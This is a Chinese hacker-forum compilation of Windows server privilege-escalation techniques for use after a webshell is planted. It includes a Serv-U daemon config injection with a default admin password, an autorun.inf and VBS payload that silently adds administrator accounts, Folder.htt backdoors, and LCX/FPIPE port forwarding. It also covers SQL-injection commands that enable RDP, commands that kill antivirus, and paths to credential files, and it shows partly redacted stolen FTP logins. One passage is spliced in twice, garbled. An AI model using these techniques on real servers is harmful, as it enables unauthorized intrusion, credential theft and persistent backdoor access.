思路：

1，SER-TU提权（通常是利用SERFTP服务器管理工具，首先要在安装目录下找到INI配置文件，必须具备可写入的权限）
2，RADMIN提权（大家并不陌生，我们在扫描4899空口令后，同样需要他来连接）
3，PCANYWHRER提权（也是远程客户端软件，下载安装目录的CIF文件进行破解）
4，SAM提权（SAM系统帐户，通常需要下载临时存放的SAM文件，然后进行HASH破解）
5，NC提权（利用NC命令，反弹一个端口，然后TELNET远程去连接一个端口，虽然权限不够大，结合巴西烤肉，能够成功的）
6，PR提权（PR提权，这个就不多说了，最好是免杀的PR大杀器，这样更方面我们去操作）
7，IIS提权（IIS6.0提权，首先需要获取IIS的配置信息，利用工具进行添加后门用户）
8，43958提权（如果SER-TU有直接读入和执行的权限，那么我们就可以直接提权）
9，PERL提权（PERL提权通常是针对PERL文件夹下的提权方式，利用DIR目录%20NET USER这样来建立后门用户）
10，内网LCX提权（转发工具LCX，通常需要先本地监听一个端口，然后转发，针对内网，用本地的127连接对方的3389）
11，启动提权（如果服务器启动项有能够执行的权限，那么应该说管理员的技术肯定不精湛）
12，替换服务提权（替换某个服务EXE，比如SER-TU，可将原有的删除，再传一个同样的SER.EXE上去，等待服务器重启）
13，FXP提权（FXP这个工具其实本身他是一个传输工具，但我们可以下载他的三个文件，然后，用密码查看器的功能去获得密码）
14，输入法提权（目前来说的话，输入法提权的思路基本上不太可行了）
15，360提权（360提权，也就是我们常说的SHIFT后门，如果执行了360漏洞利用程序，连接服务器用SHIFT5下，弹出了CMDSHELL即为
成功）
16，VNC提权（VNC，想必大家并不陌生，我们通常是扫描5900国外服务器时候用到VNC来连接的，同样，我们如果得到了VNC的密码，
通常可以利用他来提权）
17，2003ODAY提权（如果服务器是2003的，那么就可以利用2003ODAY利用工具来进行提权了）
18，ROOT提权（如果你获得了MSSQL的密码，那么就可以导入注册表的方式，利用MSSQL语句执行我们想要的命令了）
19，SA密码服务器提权（通常去寻找SA，MSSQL的相关密码，比如CONFIG.ASP,CONN.ASP等等)
20，FTP溢出提权(这个用到LCX工具，本地溢出，转发一个端口，虽然不是内网，利用默认的21进行提升权限）


方法：



第一，WEBSHELL 权限提升技巧


C:\DocumentsandSettings\AllUsers\ApplicationData\Symantec\pcAnywhere\


看能否跳转到这个目录，如果行那就最好了，直接下它的 CIF 文件，破解得到 pcAnywhere密码，登陆.


c:\ProgramFiles\serv-u\


C:\WINNT\system32\config\


下它的 SAM，破解密码


c:\winnt\system32\inetsrv\data\


是 erveryone完全控制，很多时候没作限制，把提升权限的工具上传上去，然后执行


c:\perl


C:\ProgramFiles\JavaWebStart\


c:\DocumentsandSettings\


C:\DocumentsandSettings\AllUsers\


c:\winnt\system32\inetsrv\data\


c:\ProgramFiles\


c:\ProgramFiles\serv-u\


C:\ProgramFiles\MicrosoftSQLServer\


c:\Temp\


c:\mysql\(如果服务器支持 PHP）


c:\PHP(如果服务器支持 PHP）


运行”cscriptC:\Inetpub\AdminScripts\adsutil.vbsgetw3svc/inprocessisapiapps”来提升权限还可以用这段代码试提升，好象不是很理想的如果主机设置很变态，可以试下在 c:\DocumentsandSettings\AllUsers\「开始」菜单\程序\启动”写入 bat，vbs 等木马。

根目录下隐藏 autorun.inf


C:\PROGRAMFILES\KV2004\


D:\PROGRAMFILES\RISING\RAV\


C:\ProgramFiles\Real\RealServer\


Folder.htt 与 desktop.ini


将改写的 Folder.htt 与 desktop.ini，还有你的木马或者是 VBS 或者是什么，放到对方管理员最可能浏览的目录下replace替换法捆绑脚本编写一个启动/关机脚本重起删 SAM错CAcls 命令FlashFXP 文件夹 Sites.datSites.dat.bakStats.datStats.dat.bak

  


第二，Ring 的权限提升 21大法！


以下全部是本人提权时候的总结 很多方法至今没有机会试验也没有成功，但是我是的确看见别人成功过的。本人不才，除了第一种方法自己研究的，其他的都是别人的经验总结。希望对朋友有帮助！

1.radmin连接法


条件是你权限够大，对方连防火墙也没有。封装个 radmin上去，运行，开对方端口，然后 radmin上去。本人从来米成功过。，端口到是给对方打开了。


2.paanywhere


C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 这里下他的 GIF文件，在本地安装 pcanywhere上去

3.SAM 破解


C:\WINNT\system32\config\ 下他的 SAM 破解之


4.SU密码夺取


C:\Documents and Settings\All Users\「开始」菜单\程序\


引用：Serv-U，然后本地查看属性，知道路径后，看能否跳转进去后，如果有权限修改 ServUDaemon.ini，加个用户上去，密码为空


[USER=WekweN|1]


Password=


HomeDir=c:\


TimeOut=600


Maintenance=System


Access1=C:\|RWAMELCDP


Access1=d:\|RWAMELCDP


Access1=f:\|RWAMELCDP


SKEYvalues=


这个用户具有最高权限，然后我们就可以 ftp上去 quote site exec xxx 来提升权限


5.c:\winnt\system32\inetsrv\data\


引用：就是这个目录，同样是 erveryone 完全控制，我们所要做的就是把提升权限的工具上传上去， 然后执行


6.SU溢出提权


这个网上教程 N 多，不详细讲解了


7.运行 Csript


引用：运行”cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps”来提升权限 用这个 cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps

查看有特权的 dll 文件：idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll


再将 asp.dll 加入特权一族asp.dll 是放在 c:\winnt\system32\inetsrv\asp.dll (不同的机子放的位置不一定一样)


我们现在加进去


cscript adsutil.vbs set /W3SVC/InProcessIsapiApps ”C:\WINNT\system32\idq.dll”


“C:\WINNT\system32\inetsrv\httpext.dll” ”C:\WINNT\system32\inetsrv\httpodbc.dll”

“C:\WINNT\system32\inetsrv\ssinc.dll” ”C:\WINNT\system32\msw3prt.dll””c:\winnt\system32

\inetsrv\asp.dll”


可以用 cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 来查看是不是加进去了


8.脚本提权


c:\Documents and Settings\All Users\「开始」菜单\程序\启动”写入 bat、vbs


9.VNC


这个是小花的文章 HOHO


默认情况下 VNC 密码存放在HKCU\Software\ORL\WinVNC3\Password


我们可以用 vncx4 破解它，vncx4 使用很简单，只要在命令行下输入


c:\>vncx4 -W


然后顺序输入上面的每一个十六进制数据，没输完一个回车一次就行了。


10.NC 提权


给对方来个 NC 但是条件是你要有足够的运行权限 然后把它反弹到自己的电脑上 HOHO OK 了


11.社会工程学之 GUEST提权


很简单 查看他的拥护 一般来说 看到帐户以后 密码尽量猜 可能用户密码一样 也可能是他 QQ 号 邮箱号 手机号 尽量看看 HOHO


12.IPC 空连接


如果对方真比较白痴的话 扫他的 IPC 如果运气好还是弱口令


13.替换服务


这个不用说了吧？个人感觉相当复杂


14.autorun .inf


autorun=xxx.exe 这个=后面自己写 HOHO 加上只读、系统、隐藏属性 传到哪个盘都可以的不相信他不运行


15.desktop.ini 与 Folder.htt


引用：首先，我们现在本地建立一个文件夹，名字不重要，进入它，在空白处点右键，选择“自定义 文件夹”（xp好像是不行的）一直下点，默认即可。完成后，你就会看到在此目录下多了两个名为 Folder setting的文件架与 desktop.ini 的文件，（如果你看不到，先取消”隐藏受保护的操作系统文件”） 然后我们在 Folder setting目录下找到 Folder.htt 文件， 记事本打开，在任意地方加入以下代码：然后你将你的后门文件放在 Folder setting 目录下，把此目录与desktop.ini 一起上传到对方 任意一个目录下，就可以了，只要等管理员浏览了此目录，它就执行了我们的后门。就执行了我们的后门。

16.su覆盖提权


本地安装个 su， 将你自己的 ServUDaemon.ini 文件用从他那下载下来的 ServUDaemon.ini 覆盖掉，重起一下 Serv-U，于是你上面的所有配置都与他的一模一样了

17.SU转发端口


43958 这个是 Serv －U 的本地管理端口。FPIPE.exe 上传他，执行命令： Fpipe–v–l 3333


–r 43958 127.0.0.1 意思是将 4444 端口映射到 43958端口上。 然后就可以在本地安装一个


Serv-u， 新建一个 服务器， IP 填对方 IP， 帐号为 LocalAdministrator 密码为#1@$ak#.1k;0@p


连接上后你就可以管理他的 Serv-u了。


18.SQL帐户密码泄露


如果对方开了 MSSQL 服务器，我们就可以通过用 SQL 连接器加管理员帐号（可以从他的连接数据库的 ASP 文件中看到），因为 MSSQL是默认的 SYSTEM 权限。

引用：对方没有删除 xp_cmdshell 方法：使用 Sqlexec.exe，在 host 一栏中填入对方 IP，User与 Pass 中填入你所得到的用户名与密码。format 选择 xp_cmdshell”%s”即可。然后点击connect，连接上后就可 以在 CMD 一栏中输入你想要的 CMD 命令了

19.asp.dll


引用：因为asp.dll 是放在 c:\winnt\system32\inetsrv\asp.dll (不同的机子放的位置不一定相同) 我们现在加进去


cscript adsutil.vbs set /W3SVC/InProcessIsapiApps ”C:\WINNT\system32\idq.dll”


“C:\WINNT\system32\inetsrv\httpext.dll” ”C:\WINNT\system32\inetsrv\httpodbc.dll”

“C:\WINNT\system32\inetsrv\ssinc.dll” ”C:\WINNT\system32\msw3prt.dll””c:\winnt\system32

\inetsrv\asp.dll”


好了,现在你可以用 cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 来查看是不是加进去了,注意,用法中的 get 和 set,一个是查看一个是设置.还有就是你运行上面的你要到C:\Inetpub\AdminScripts>这个目录下.

那么如果你是一个管理员,你的机子被人用这招把 asp 提升为 system 权限,那么,这时,防的方法就是把asp.dll T出特权一族,也就是用 set 这个命令,覆盖掉刚才的那些东东.

20.Magic Winmail


前提是你要有个 webshell 引用： http://www.eviloctal.com/forum/read.phptid=3587 这里去看吧


21.DBO……


其实 提升权限的方式很多的 就看大家怎么利用了 HOHO 加油吧 将服务器控制到底！


感谢 noangel


  


第三，WEBSHELL 权限提升


动网上传漏洞，相信大家拿下不少肉鸡吧，但是都是WEBSHELL，不能拿到系统权限，要如何拿到系统权限呢？这正是我们这次要讨论的内容OK，进入我的WEBSHELL

啊哈，不错，双 CPU，速度应该跟的上，不拿下你我怎么甘心啊


输入密码，进入到里面看看，有什么好东西没有，翻了下，好像也没有什么特别的东西，看看能不能进到其他的盘符，点了下 C 盘，不错不错，可以进去，这样提升就大有希望了一 serv－u提升

OK，看看他的 PROGRAME 里面有些什么程序，哦，有 SERV-U，记得有次看到 SERV-U有默认的用户名和密码，但是监听的端口是 43958，而且是只有本地才能访问的，但是我们有端口转发工具的啊，不怕。先看看他的 SERV-U的版本是多少，

telnet XXX.XXX.XXX.XXX 21


显示竟然是 3.0 的，唉，不得不说这个管理员真的不称职。后来完毕后扫描了下，也只有FTP 的洞没有补。既然是这样，我们就开始我们的提升权限了


上传 FPIPE，端口转发工具。


在运行 CMD 命令里输入 d:\\wwwroot\\fpipe.exe -v -l 81 -r 43958 127.0.0.1 意思是把本机的43598 端口转发到 81端口。然后打开我们自己机子上的 SERV-U，点 Serv－U服务器，点菜单栏上的的服务器， 点新建服务器， 然后输入 IP， 输入端口， 记得端口是刚刚我们转发的 81端口。服务名称随便你喜欢，怎么样都行。

然后是用户名：LocalAdministrator  


密码：#l@$ak#.lk;0@P (密码都是字母)


确定，然后点刚刚建的服务器，然后就可以看到已有的用户，自己新建一个用户，把所有权限加上。也不锁定根目录接下来就是登陆了，登陆 FTP 一定要在 CMD 下登陆，进入后一般命令和DOS 一样，添加用户的时候

ftp>quote site exec net.exe user hk pass /add


ftp>quote site exec net.exe localgroup administrators hk/add


如果对方开了 3389 的话，就不用我教你怎么做了，没开的话，新建立 IPC 连接，在上传木马或者是开启 3389 的工具


二 auto.ini 加 SHELL.VBS


autorun.inf


[autorun]


open=shell.vbs


shell.vbs


dim wsh


set wsh=createObject(“WScript.Shell”)


wsh.run ”net user guest /active:yes”,0


wsh.run ”net user guest 520ls”,0


wsh.run ”net localgroup administrators guest /add”,0


wsh.run ”net user hkbme 520ls /add”,0


wsh.run ”net localgroup administrators hkbme /add”,0


wsh.run ”cmd.exe /c del autorun.inf”,0


wsh.run ”cmd.exe /c del shell.vbs”,0


但是这样要可以访问到对方的根目录。将这两个文件放到对方硬盘的根目录下。当然你也可以直接执行木马程序，还要一个木马程序，但是语句就和最后两句一样，通过 CMD 执行木马程序

三 Folder.htt 与 desktop.ini


将改写的 Folder.htt 与 desktop.ini，还有你的木马或者是 VBS 或者是什么，放到对方管理员


最可能浏览的目录下，觉得一个不够，可以多放几个


Folder.htt 添加代码， 但是后门和这两个文件必须要放到一块， 有点问题， 可以结合启动 VBS，


运行结束后，删除上传的后门.就是 CODEBASE=”shell.vbs”.shell 写法如上


四，replace替换法


替换正在执行的文件。用这个几乎可以马上得到权限，但是我没有做过试验，可以试下，将对方正在执行的文件替换为和它文件名一样的，捆绑了木马的。为什么不直接替换木马呢？如果替换的是关键程序，那不是就直接挂了？所以还是捆绑好点格式

REPLACE [drive1:][path1]filename [drive2:][path2] [/A]


[/R] [/W]


REPLACE [drive1:][path1]filename [drive2:][path2]


[/R] [/S] [/W]


[drive1:][path1]filename 指定源文件。


[drive2:][path2] 指定要替换文件的


目录。


/A 把新文件加入目标目录。不能和


/S 或 /U 命令行开关搭配使用。


/P 替换文件或加入源文件之前会先提示您进行确认。


/R 替换只读文件以及未受保护的文件。


/S 替换目标目录中所有子目录的文件。


不能与 /A 命令选项搭配使用。


/W 等您插入磁盘以后再运行。


/U 只会替换或更新比源文件日期早的文件。


不能与 /A 命令行开关搭配使用


这个命令没有试验过，看能不能替换不能访问的文件夹下的文件，大家可以试验下


五 脚本


编写一个启动/关机脚本配置文件 scripts.ini，这个文件名是固定的，不能改变。内容如下：


[Startup]


0CmdLine=a.bat


0Parameters=


将文件 scripts.ini 保存到”C:\\winnt\\system32\\GroupPolicy\\Machine\\Scripts”


A.BAT的内容可以是 NET USER yonghu mima


也可以是NET USER ADMINistrator XXX


这样可以恢复你想要得任意用户名的密码，也可以自己增加新的用户，但是要依赖重启，还有就是对 SYSTEM32 有写的权限


六 SAM


如果可以访问对方的 SYSTEM32 的话，删除对方的 SAM 文件，等他重启以后就是 ADMIN用户密码为空突然又有了想法，可以用 REPLACE 命令替换的吗，可以把你的 SAM 文件提取出来，上传到他的任意目录下，然后替换。不过不知道如果对 SYSTEM32 没有权限访问的话，能不能实现替换

——————————————————————————–


第四，使用 FlashFXP来提升权限


最近各位一定得到不少肉鸡吧，从前段时间的动网的 upfile 漏洞， 动力文章系统最新漏洞到 first see发现的动网 sql 版本的一个超级大漏洞。有人一定忙的不易乐乎，大家的方法也不过是使用一下 asp 脚本的后门罢了。至于提 升权限的问题呵呵，很少有人能作一口气完成。关键还是在提升权限上做个问题上，不少服务器设置的很 BT，你的 asp 木马可能都用不了，还那里来的提升啊。我们得到 webshell 也就是个低级别的用户的权限，各种提升权限方法是可谓五花八门啊，如何提升就看你自己的妙招了。

其一，如果服务器上有装了 pcanywhere 服务端，管理员为了便于管理也给了我们方便，到系统盘的 Documents and Settings/All Users/Application Data/Symantec/pcAnywhere/中下载*.cif本地破解就使用 pcanywhere连接就 ok了。

其二，如果对方有 Serv-U大家不要骂我啊，通过修改 ServUDaemon.ini 和 fpipe这软件提升权限应该是不成问 题吧。


其三，通过替换系统服务来提升。


其四，查找 conn和 config这类型的文件看能否得到 sa 或者 mysql 的相关密码，可能会有所收获等等。本人在一次无聊的入侵过程中发现了这个方法，使用Flashfxp也能提升权限，但是成功率高不高就看你自己的运气了

本人 www.xxx.com 通过 bbs 得到了一个 webshell，放了个小马(现在海阳的名气太大了偶不敢放)，而且已经将一段代码插入了N 个文件中，够黑吧。提升权限没时间做。在我放假回家后，一看我晕bbs 升级到动网 sp2 了我放的小马也被 K 了，人家的 BBS 是 access 版本的。郁闷啊！突然想起我将一个页面插入了 asp 的后门，看看还有没有希望了。输www.xxx.com/xx.aspid =1 好家伙，还在！高兴 ing于是上传了一个 asp的脚本的后门，怎么提升权限呢在这个网站的主机上游荡了N 分钟， 在 C:\\ Program Files 下发现了 FlashFXP 文件夹(跟我一样使用这个软件自己心里暗想)图 2， 于是就打了了 Sites. dat 这个文件(编辑)这是什么东西密码和用户名，而且密码是加了密的。

如果我把这些文件 copy回本地也就是我的计算机中，替换我本地的相应文件会怎么样呢于是我就将 Sites.dat Sites.dat.bak Stats.dat Stats.dat.bak几个文件下载到我的计算机中替换了我电脑中 flashfxp 文件夹的相应文件。打开 flashfxp 在站点中打开站点管理器一项。乖 乖发财了对方管理员通过 flashfxp连接的各个站点都在图 3，点击连接。通过了于是我们又有了一堆肉鸡，我们有 ftp权限。上传脚本 木马~ 呵呵。说了半天这提升权限的事情一点没讲啊 不要急，大家看看对方管理员的这站点管理器，有用户名和密码，密码是星号的。可惜啊！又想起了在 Sites.dat 中也显示了密码和用户名，而且密码是加密的。现在的星号密码会不会也是加了密的看看就行了呗。怎么看 菜鸟了吧 手头有个不错的查看星号的软件，就是 xp 星号密码查看器，通过查看跟Sites.dat 中加密了密码做比较。看图 4 和图 5 的比较 很显然在站点管理器中查看到的密码是明文显示的。发财了吧

下一步就是使用 xp 星号密码查看器这个软件来提取密码和用户名。看者这些复杂的密码，还真有点怀念当年玩 sniff的时光。呵呵


密码为:b69ujkq6 hyndai790 s584p*fv4-c+ 98cq3jk4 3-8*ef./2z5+


用户名:bn7865t nilei75 qm/-g57+3kn qm/-g57+3kn 5.e*82/+69


(上述部分密码和用户名已经作了必要的修改)


这么多的信息，按社会工程学的概念来说，没有管理员的密码。打死我也不相信。最终我得到了这个网站管理员的密码从这堆东西中找到 的。


我想这个问题应该反馈到 flashfxp官方，让他们在下个版本中修正这个漏洞或者说是错误。


经过后来测试只要把含有密码和用户名的 Sites.dat 文件替换到本地相应的文件就可以在本地还原对方管理员的各个站点的密码。 希望大家在入侵的时候遇到 fla shfxp的时候能想到这个方法，至少也可以得到一堆新的肉鸡。不防试试希望能给大家渗透带来帮助。

——————————————————————————–


第五，将 asp权限提到最高


by: cnqing from:http://friend.91eb.com


本来是要写个提权asp木马的，可惜时间不是太多功底也不是太深。先把原理方法告诉大家


好了。简单说说，说的太麻烦没有必要。懂了就行。


原理：


asp文件的教本解释是由asp.dll 运行的。由 dllhost.exe启动的。身分是 IWAN_NAME。若是把 asp.dll 放到 inprocesslsapiapps 中那它就是由 inetifo.exe直接启动。身份是 system

方法：


第一步。


得到 inprocesslsapiapps 内容，用命令”cscript C:\\Inetpub\\AdminScripts\\adsutil.vbs getw3svc/inprocessisapiapps”。将得到的一组 dll 复制下来。

第二步


写一个 bat 内容为”cscript C:\\Inetpub\\AdminScripts\\ adsutil vbs set w3svc/inprpocessisapiapps

“C:\\Inetpub\\AdminScripts\\asp.dll” ·····


省略号为复制下的内容。中间用空格分开不要带回车符最后运行这个 bat 就行了。


例如：


我用”cscript C:\\Inetpub\\AdminScripts\\adsutil.vbs get w3svc/inprocessisapiapps”得到

“c:\\winnt\\system32\\inetsrv\\httpext.dll”


“c:\\winnt\\system32\\inetsrv\\httpodbc.dll”


“C:\\WINNT\\system32\\inetsrv\\ssinc.dll”


“C:\\WINNT\\System32\\msw3prt.dll”


“C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server


Extensions\\isapi\\_vti_aut\\author.dll”


“C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server


Extensions\\isapi\\_vti_adm\\admin.dll”


“C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\isapi\\shtml.dll”

那么你的 bat 就应该是：


cscript C:\\Inetpub\\AdminScripts\\adsutil vbs set w3svc/inprpocessisapiapps


“C:\\Inetpub\\AdminScripts\\asp.dll” ”c:\\winnt\\system32\\inetsrv\\httpext.dll”

“c:\\winnt\\system32\\inetsrv\\httpodbc.dll” ”C:\\WINNT\\system32\\inetsrv\\ssinc.dll”

“C:\\WINNT\\System32\\msw3prt.dll” ”C:\\Program Files\\Common Files\\Microsoft


Shared\\Web Server Extensions\\isapi\\_vti_aut\\author.dll” ”C:\\Program Files\\Common

Files\\Microsoft Shared\\Web Server Extensions\\isapi\\_vti_adm\\admin.dll” ”C:\\Program

Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\isapi\\shtml.dll”


已测试成功！！


——————————————————————————–


第六，利用%5c绕过验证


—————————————


lake2（http://mrhupo.126.com）


—————————————


说到%5c，你是不是想起了当前流行的那个%5c暴库漏洞，呵呵，本文就是对%5c利用的探索（呵呵，当然有我提出的新东东，或许对你有帮助哦^_^）。


好，我们先追根溯源，找到那个漏洞的老底。看看绿盟 2001 年的漏洞公告：


[url=http://www.nsfocus.net/index.phpac



部分提权指令：

ipconfig 显示本地IP地址


net start telnet 开telnet服务


net use z:127.0.0.1c$　　　　　映射对方的C盘


net user　　　　　　　　　　　　查看所有用户列表


net user hucxsz hucxsz /add 添加用户hucxsz密码为hucxsz


net localgroup administrators hucxsz /add 将帐号hucxsz升级为管理员


开3389


REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f


whoami 查看当前用户


NET START（<span style=]http://www.nsfocus.net/index.phpac



部分提权指令：

ipconfig 显示本地IP地址


net start telnet 开telnet服务


net use z:127.0.0.1c$　　　　　映射对方的C盘


net user　　　　　　　　　　　　查看所有用户列表


net user hucxsz hucxsz /add 添加用户hucxsz密码为hucxsz


net localgroup administrators hucxsz /add 将帐号hucxsz升级为管理员


开3389


REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f


whoami 查看当前用户


NET START（ 80<1.txt


-vv: 回显


80: www端口


1.txt: 就是你要发送的数据包


———————————–


LCX端口转发


先本地监听51端口 lcx.exe -listen 51 3389


c:\recycler\lcx.exe -slave 自己的ip 51 肉鸡IP 3389 LCX转发


c:\recycler\lcx.exe -slave 222.222.222.222 51 111.111.111.111 3389[/url]

某大牛的渗透笔记：

1.能不能执行cmd就看这个命令：net user，net不行就用net1，再不行就上传一个net到可写可读目录，执行/c c:windowstempcookiesnet1.exe user


2.当提权成功，3389没开的情况下，上传开3389的vps没成功时，试试上传rootkit.asp 用刚提权的用户登录进去就是system权限，再试试一般就可以了。


3.cmd拒绝访问的话就自己上传一个cmd.exe 自己上传的后缀是不限制后缀的，cmd.exe/cmd.com/cmd.txt 都可以。


4.cmd命令：systeminfo，看看有没有KB952004、KB956572、KB970483这三个补丁，如果没有，第一个是pr提权，第二个是巴西烤肉提权，第三个是iis6.0提权。


6.c:windowstempcookies 这个目录


7.找sa密码或是root密码，直接利用大马的文件搜索功能直接搜索，超方便！


8.cmd执行exp没回显的解决方法：com路径那里输入exp路径C:RECYCLERpr.exe，命令那里清空(包括/c )输入”net user jianmei daxia /add”


9.增加用户并提升为管理员权限之后，如果连接不上3389，上传rootkit.asp脚本，访问会提示登录，用提权成功的账号密码登录进去就可以拥有管理员权限了。


10.有时变态监控不让添加用户，可以尝试抓管理哈希值，上传“PwDump7 破解当前管理密码(hash值)”，俩个都上传，执行PwDump7.exe就可以了，之后到网站去解密即可。


11.有时增加不上用户，有可能是密码过于简单或是过于复杂，还有就是杀软的拦截，命令 tasklist 查看进程


12.其实星外提权只要一个可执行的文件即可，先运行一遍cmd，之后把星外ee.exe命名为log.csv 就可以执行了。


13.用wt.asp扫出来的目录，其中红色的文件可以替换成exp，执行命令时cmd那里输入替换的文件路径，下面清空双引号加增加用户的命令。


14.提权很无奈的时候，可以试试TV远控，通杀内外网，穿透防火墙，很强大的。


15. 当可读可写目录存在空格的时候，会出现这样的情况：’Cocuments’ 不是内部或外部命令，也不是可运行的程序 或批处理文件。解决办法是利用菜刀的交互shell切换到exp路径，如：Cd Cocuments and SettingsAll UsersApplication DataMicrosoft 目录
然后再执行exp或者cmd，就不会存在上面的情况了，aspshell一般是无法跳转目录的～


16.有时候可以添加用户，但是添加不到管理组，有可能是administrators改名了，net user administrator 看下本地组成员，*administrators


17.进入服务器，可以继续内网渗透 这个时候可以尝试打开路由器 默认帐号密码 admin admin


18.有的cmd执行很变态，asp马里，cmd路径填上面，下面填：””c:xxxexp.exe “whoami” 记得前面加两个双引号，不行后面也两个，不行就把exp的路径放在cmd那里，下面不变。


19.一般增加不上用户，或是想添加增加用户的vbs,bat,远控小马到服务器的启动项里，用“直接使服务器蓝屏重启的东东”这个工具可以实现，


20.执行PwDump7.exe抓哈希值的时候，建议重定向结果到保存为1.txt /c c:windowstempcookiesPwDump7.exe >1.txt


21.菜刀执行的技巧，上传cmd到可执行目录，右击cmd 虚拟终端，help 然后setp c:windowstempcmd.exe 设置终端路径为：c:windowstempcmd.exe


22.当不支持aspx，或是支持但跨不了目录的时候，可以上传一个读iis的vps，执行命令列出所有网站目录，找到主站的目录就可以跨过去了。
上传cscript.exe到可执行目录，接着上传iispwd.vbs到网站根目录，cmd命令/c “c:windowstempcookiescscript.exe” d:webiispwd.vbs


23.如何辨别服务器是不是内网？ 192.168.x.x 172.16.x.x 10.x.x.x


(( dos命令大全 ))


查看版本：ver


查看权限：whoami


查看配置：systeminfo


查看用户：net user


查看进程：tasklist


查看正在运行的服务：tasklist /svc


查看开放的所有端口：netstat -ano


查询管理用户名：query user


查看搭建环境：ftp 127.0.0.1


查看指定服务的路径：sc qc Mysql


添加一个用户：net user jianmei daxia.asd /add


提升到管理权限：net localgroup administrators jianmei /add


添加用户并提升权限：net user jianmei daxia.asd /add & net localgroup administrators jianmei /add


查看制定用户信息：net user jianmei


查看所有管理权限的用户：net localgroup administrators


加入远程桌面用户组：net localgroup “Remote Desktop Users” jianmei /add


突破最大连接数：mstsc /admin /v:127.0.0.1


删除用户：net user jianmei /del


删除管理员账户:net user administrator daxia.asd


更改系统登陆密码：net password daxia.asd


激活GUEST用户：net user guest /active:yes


开启TELNET服务：net start telnet


关闭麦咖啡：net stop “McAfee McShield”


关闭防火墙：net stop sharedaccess


查看当前目录的所有文件：dir c:windows


查看制定文件的内容：type c:windows1.asp


把cmd.exe复制到c:windows的temp目录下并命名为cmd.txt：copy c:windowstempcookiescmd.exe c:windowstempcmd.txt


开3389端口的命令：REG ADD HKLMSYSTEMCurrentControlSetControlTerminal” “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f


查 看补丁：dir c:windows>a.txt&(for %i in (KB952004.log KB956572.log KB2393802.log KB2503665.log KB2592799.log KB2621440.log KB2160329.log KB970483.log KB2124261.log KB977165.log KB958644.log) do @type a.txt|@find /i “%i”||@echo %i Not Installed!)&del /f /q /a a.txt


(( SQL语句直接开启3389 ))


3389登陆关键注册表位置：HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminalServerDenyTSConnections


其中键值DenyTSConnections 直接控制着3389的开启和关闭，当该键值为0表示3389开启，1则表示关闭。


而MSSQL的xp_regwrite的存储过程可以对注册进行修改，我们使用这点就可以简单的修改DenyTSConnections键值，从而控制3389的关闭和开启。


开启3389的SQL语句：
syue.com/xiaohua.asp?id=100;exec master.dbo.xp_regwrite’HKEY_LOCAL_MACHINE’,’SYSTEMCurrentControlSetControlTerminal Server’,’fDenyTSConnections’,’REG_DWORD’,0;–


关闭3389的SQL语句：
syue.com/xiaohua.asp?id=100;exec master.dbo.xp_regwrite’HKEY_LOCAL_MACHINE’,’SYSTEMCurrentControlSetControlTerminal Server’,’fDenyTSConnections’,’REG_DWORD’,1;–


(( 常见杀软 ))


360tray.exe 360实时保护


ZhuDongFangYu.exe 360主动防御


KSafeTray.exe 金山卫士


McAfee McShield.exe 麦咖啡


SafeDogUpdateCenter.exe 服务器安全狗


(( windows提权中敏感目录和敏感注册表的利用 ))


敏感目录 目录权限 提权用途


Crogram Files 默认用户组users对该目录拥有查看权 可以查看服务器安装的应用软件
Cocuments and SettingsAll Users「开始」菜单程序 Everyone拥有查看权限 存放快捷方式，可以下载文件，属性查看安装路径
Cocuments and SettingsAll UsersDocuments Everyone完全控制权限 上传执行cmd及exp
C:windowssystem32inetsrv Everyone完全控制权限 上传执行cmd及exp
C:windowsmy.iniCrogram FilesMySQLMySQL Server 5.0my.ini 默认用户组users拥有查看权限 安装mysql时会将root密码写入该文件
C:windowssystem32 默认用户组users拥有查看权限 Shift后门一般是在该文件夹，可以下载后门破解密码
Cocuments and SettingsAll Users「开始」菜单程序启动 Everyone拥有查看权限 可以尝试向该目录写入vbs或bat，服务器重启后运行。
C:RECYCLERD:RECYCLER Everyone完全控制权限 回收站目录。常用于执行cmd及exp
Crogram FilesMicrosoft SQL Server 默认用户组users对该目录拥有查看权限 收集mssql相关信息，有时候该目录也存在可执行权限
Crogram FilesMySQL 默认用户组users对该目录拥有查看权限 找到MYSQL目录中user.MYD里的root密码
Craclexe 默认用户组users对该目录拥有查看权限 可以尝试利用Oracle的默认账户提权
C:WINDOWSsystem32config 默认用户组users对该目录拥有查看权限 尝试下载sam文件进行破解提权
Crogram FilesGeme6 FTP ServerRemote AdminRemote.ini 默认用户组users对该目录拥有查看权限 Remote.ini文件中存放着G6FTP的密码
crogram FilesRhinoSoft.comServ-Ucrogram FilesServ-U 默认用户组users对该目录拥有查看权限 ServUDaemon.ini 中存储了虚拟主机网站路径和密码
c:windowssystem32inetsrvMetaBase.xml 默认用户组users对该目录拥有查看权限 IIS配置文件
C:tomcat5.0confresin.conf 默认用户组users对该目录拥有查看权限 Tomat存放密码的位置
C:ZKEYSSetup.ini 默认用户组users对该目录拥有查看权限 ZKEYS虚拟主机存放密码的位置


(( 提权中的敏感注册表位置 ))


HKEY_LOCAL_MACHINESOFTWAREMicrosoftMSSQLServerMSSQLServerSuperSocketNetLibTcp Mssql端口
HKLMSYSTEMCurrentControlSetControlTerminal Server DenyTSConnections 远程终端 值为0 即为开启
HKEY_LOCAL_MACHINESOFTWAREMySQL AB mssql的注册表位置
HKEY_LOCAL_MACHINESOFTWAREHZHOSTCONFIG 华众主机注册表配置位置
HKEY_LOCAL_MACHINESOFTWARECat SoftServ-UDomains1UserList serv-u的用户及密码（su加密）位置
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminalServer WinStationsRDP-Tcp 在该注册表位置PortNumber的值即位3389端口值
